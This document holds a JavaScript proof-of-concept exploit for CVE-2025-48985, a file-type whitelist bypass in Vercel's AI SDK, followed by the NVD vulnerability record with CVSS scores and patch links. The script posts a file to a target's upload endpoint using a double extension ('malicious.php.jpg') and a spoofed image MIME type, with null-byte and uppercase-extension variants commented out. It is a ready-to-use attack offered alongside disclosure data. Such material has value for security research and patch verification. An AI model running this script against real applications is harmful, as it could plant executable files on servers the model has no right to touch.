CVE-2025-48985

// CVE-2025-48985 PoC - File Type Whitelist Bypass in Vercel AI SDK // This PoC demonstrates how an attacker could bypass file type restrictions const axios = require('axios'); const FormData = require('form-data'); const fs = require('fs'); async function exploitCVE202548985(targetUrl, maliciousFile) { const form = new FormData(); // Attempt to bypass file type whitelist using extension manipulation // Technique 1: Double extension bypass form.append('file', fs.createReadStream(maliciousFile), { filename: 'malicious.php.jpg', // Bypass with double extension contentType: 'image/jpeg' // Spoof MIME type }); // Technique 2: Null byte injection (if applicable) // form.append('file', fs.createReadStream(maliciousFile), { // filename: 'malicious.php\x00.jpg', // }); // Technique 3: Case manipulation // form.append('file', fs.createReadStream(maliciousFile), { // filename: 'malicious.PHP', // }); try { const response = await axios.post(targetUrl + '/api/upload', form, { headers: { ...form.getHeaders(), }, timeout: 10000 }); console.log('Upload Response:', response.data); console.log('Status:', response.status); return response.data; } catch (error) { if (error.response) { console.log('Error Response:', error.response.data); console.log('Status Code:', error.response.status); } else { console.log('Request Error:', error.message); } return null; } } // Usage example // exploitCVE202548985('https://target-ai-app.vercel.app', './malicious.php'); module.exports = { exploitCVE202548985 };

{"cve": {"id": "CVE-2025-48985", "sourceIdentifier": "[email protected]", "published": "2025-11-07T01:15:36.567", "lastModified": "2026-02-04T21:11:11.667", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in Vercel’s AI SDK has been fixed in versions 5.0.52, 5.1.0-beta.9, and 6.0.0-beta. This issue may have allowed users to bypass filetype whitelists when uploading files. All users are encouraged to upgrade.\r\n\r\nMore details: https://vercel.com/changelog/cve-2025-48985-input-validation-bypass-on-ai-sdk"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.0.52", "matchCriteriaId": "4A47352A-21CC-43DD-BBCB-64B24A03746D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta0:*:*:*:*:*:*", "matchCriteriaId": "FDD78D08-7B1C-4405-8B34-8189DFCCB746"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "A1E07AF8-66E6-4039-9087-2DEC1B5952B7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "AE57A66D-F2AC-48B6-A1EF-9583BD2AB9B2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "3D89727F-B1B0-483F-9209-C8BC95CE4163"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta4:*:*:*:*:*:*", "matchCriteriaId": "DF1C6D8C-2115-4C06-B2B0-C70350D0598D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta5:*:*:*:*:*:*", "matchCriteriaId": "AE7D4CFF-AE7D-43F2-9092-FC1A12B2A3A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta6:*:*:*:*:*:*", "matchCriteriaId": "4D71DE70-9F13-4EA5-A10B-E401A55BC1B9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta7:*:*:*:*:*:*", "matchCriteriaId": "573DE1B3-EEF1-4125-9986-13BA19D8BBC9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta8:*:*:*:*:*:*", "matchCriteriaId": "BC9D7BBB-05A3-407D-8B0E-30904B735BD1"}]}]}], "references": [{"url": "https://github.com/vercel/ai/commit/930399bb9839a8baf3d349614106d78268775eed", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://vercel.com/changelog/cve-2025-48985-input-validation-bypass-on-ai-sdk", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}